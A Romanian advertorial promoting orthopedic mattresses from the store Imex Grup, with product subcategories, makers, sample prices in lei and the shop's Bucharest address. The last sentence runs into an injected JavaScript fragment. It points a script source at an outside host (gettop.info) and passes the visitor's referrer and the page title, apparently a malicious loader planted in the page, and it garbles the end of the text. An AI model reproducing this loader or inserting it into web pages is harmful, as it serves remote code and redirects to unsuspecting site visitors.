Peste tot auzim ca este recomandat sa dormim 8 ore pe noapte, pentru un rtim de viata normal si pentru un organism sanatos. Cati dintre noi insa, dormim 8 ore si mai ales, cat la suta dintre noi reusim sa avem un somn odihnitor si confortabil? Din pacate, calitatea somnului nostru are legatura, printre altele si cu salteaua pe care dormim. Un somn in urma caruia ne trezim obositi sau cu dureri de spate ar trebui sa ne puna pe ganduri. Daca alegem sa dormim pe o saltea nepotrivita, putem sa ne trezim cu dureri de spate, de gat, lombare etc. Specialistii ne recomanda, mai ales daca avem afectiuni ale spatelui sau alte tipuri, sa dormim pe saltele ortopedice .

Care este oferta in materie de saltele ortopedice pe care v-o propune magazinul Imex Grup?

Acest magazin va propune o gama foarte variata de saltele ortopedice pe care le gasiti la preturi foarte avantajoase, provenind de la producatori de incredere, cunoscuti si la noi in tara. Exista doua subcategorii pentru saltele ortopedice:

–          Saltele ortopedice ieftine- in aceasta subcategorie puteti gasi: saltea lux superortopedic, saltea solo ortopedic, saltea noroc ortopedic etc.

–          Saltele supeortopedice ieftine, cuprind saltea Elite, saltea Super Lux Ortopedica Forte, saltea Superortopedica

Printre producatorii de saltele ortopedice cu care colaboreaza acest magazin se numara: Confort, Ergo Flex, Siesta.

La ce preturi puteti cumpara saltele ortopedice?

Preturile la saltele ortopedice variaza destul de mult, in functie de producator, dimensiuni, caracteristicile pe care le are fiecare model si aspectele particulare ale acestora. De exemplu, puteti opta pentru o Saltea Optimum Superortopedica, avand ca producator Ergo Flex, la preturi incapand cu 288 lei sau o saltea Elite, al carei pret incepe de la 454 lei. Cel mai important este sa va stabiliti exact bugetul de care dispuneti si ce caracteristici doriti sa aiba viitoarea dumneavoastra saltea ortopedica. La magazinul Imex Grup veti gasi specialistii de care aveti nevoie pentru a putea alege modelele de saltele ortopedice de care aveti cu adevarat nevoie. Nu orice saltea este buna, mai ales daca suferiti de anumite afectiuni ale coloanei.

Somn linistit, sanatos si odihnitor? Da! Datorita diverselor modele de saltele ortopedice pe care le puteti cumpara de la magazinul Imex Grup

Imex Grup isi propune sa aiba clienti multumiti si sanatosi si tocmai de aceea, oferta sa in materie de saltele ortopedice este generoasa, iar preturile accesibile. Pentru a va putea bucura si dumneavoastra de confortul pe care il confera diversele modele de saltele ortopedice, nu trebuie decat sa ii contactati pe specialistii firmei Imex Grup si sa luati impreuna cu acestia cea mai buna decizie. Pentru informatii suplimentare, puteti accesa site-ul imexgrup.ro.

Datele de contact ale firmei Imex Grup, furnizor de saltele ortopedice

Cei interesati de saltele ortopedice au acum un magazin caruia i se pot adresa oricand, cu incredere. Imex Grup poate fi contactat prin e-mail, telefon sau puteti merge la punctul de lucru situate pe strada Prelungire Ghencea, nr 48 C, sectorul 6.  Apelati cu increde asadar la Imex Grup daca aveti nevoie de saltele ortopedice de inalta calitate, care sa reziste timp indelungat.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;